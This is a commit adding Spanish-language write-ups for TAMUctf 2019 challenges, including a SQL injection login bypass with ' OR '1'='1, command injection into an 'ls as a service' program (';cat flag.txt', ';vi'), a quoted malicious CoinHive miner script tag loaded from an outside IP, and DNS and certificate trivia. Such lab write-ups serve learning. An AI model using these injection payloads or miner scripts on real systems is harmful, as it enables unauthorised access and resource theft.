Agregar writeups TAMU

This commit is contained in:
2019-03-05 00:59:41 -06:00
parent e4c3da0c3d
commit 48e675fa85
7 changed files with 174 additions and 0 deletions
+33
View File
@@ -0,0 +1,33 @@
# Not Another SQLi Challenge
---
(web 100)
![http://web1.tamuctf.com](http://web1.tamuctf.com)
## Desarrollo
Para este problema se realizó una inyección SQL a un portal de login, se
supuso que la consulta a la base de datos era de las más comunmente empleada,
y que de igual forma no se realizaba ningún filtrado de caracteres especiales:
```sql
SELECT * FROM usr WHERE usuario='$usr' AND contrasena='$pswd'
```
Bastaba con formular una oración como la siguiente:
```sql
SELECT * FROM usr WHERE usuario='u' AND contrasena='' OR '1' = '1'%%
```
Bastó con llenar los campos de la siguiente manera:
Usuario: root
Paswwrod: ' OR '1'='1
Así se obtuvo la flag:
```
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!
```
+21
View File
@@ -0,0 +1,21 @@
#
---
(100 drivebyinc)
Welcome to Drive By Inc. We provide all sorts of logistical solutions for our customers. Over the past few years we moved to hosting a large portion of our business on a nice looking website. Recently our customers are complaining that the front page of our website is causing their computers to run extremely slowly. We hope that it is just because we added too much javascript but can you take a look for us just to make sure?
What is the full malicious line? (Including any HTML tags)
## Desarrollo
Revisando el código del sitio web se contró una llmada muy peculiar:
```html
<script src = http://10.187.195.95/js/colorbox.min.js></script><script>var color = new CoinHive.Anonymous("123456-asdfgh");color.start()</script></body>
```
Realizando una búsqueda se encontró que CoinHive es un Minero, y la linea anterior realizaba una llamada a la API de éste minero, se ingresó la línea como flag.
+11
View File
@@ -0,0 +1,11 @@
#
()
## Desarrollo
```
```
+29
View File
@@ -0,0 +1,29 @@
# Pwn4
---
(pwn 100)
```sh
nc pwn.tamuctf.com 4324
```
## Desarrollo
Después de ingresar al servidor nos encontramos una aplicación similar al
binario `ls`, mostraba el siguiente mensaje:
```sh
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
```
Primero intentamos usando los argumentos `*`, lo cual mostró todos los archivos
del directorio actual, uno tenía el nombre de `flag.txt`, procedimos a leer
sus contenidos con los argumentos `;cat flag.txt`, los cuales indican a `$SHELL`
realizar la ejecución de `ls` y luego `cat *.txt`, así se obtuvo la flag.
```
gigem{5y573m_0v3rfl0w}
```
+37
View File
@@ -0,0 +1,37 @@
# pwn5
---
(pwn 372)
```sh
nc pwn.tamuctf.com 4325
```
## Desarrollo
Similar a ![pwn4](./pwn4.md), aquí encontramos una versión _mejorada_ de la
aplicación, al conectarnos mostró el siguiente mensaje:
```
ls as a service (laas)(Copyright pending)
Version 2: Less secret strings and more portable!
Enter the arguments you would like to pass to ls:
```
Se intentó con el mismo método del nivel anterior, pasando los argumentos
`;cat flag.txt`, pero en esta ocasión se limitó la entrada a tres caracteres
como argumentos.
Se revisó el manual de `ls`, para buscar alguna opción inusual que mostrase el
contenido de un archivo al listar.
Después de pensar en métodos más elaborados se decidió pensar en comandos con
longitud de dos letras, el primero que llegó a la mente fue el editor de texto
`vi`, así que se pasó el argumento `;vi`, causando que se ejecutara el editor,
luego se leyó el contenido del archivo `flag.txt` con el comando `:r flag.txt`,
así fue como se obtuvo la flag:
```
gigem{r37urn_0r13n73d_pr4c71c3}
```
+24
View File
@@ -0,0 +1,24 @@
# How am I?
---
(100 misc)
What is the A record for tamuctf.com?
(Not in standard gigem{flag} format)
## Desarrollo
Se buscó más información acerca del *A record*, se encontró que éste es un
mapeo del DNS a la dirección IPv4. Bastó con realizar un ping al sitio:
```sh
ping -c 2 tamuctf.com
```
flag:
```
52.33.57.247
```
+19
View File
@@ -0,0 +1,19 @@
# Who do I trust?
(100 misc)
Who issued the certificate to ![https://tamuctf.com](https://tamuctf.com)?
(Not in standard gigem{flag} format)
## Desarrollo
Pasamos a buscar quién fue la identidad que emitió el certificado, bastó con
realizar un análisis con el navegador web del certificado.
flag:
```
DST Root CA X3
```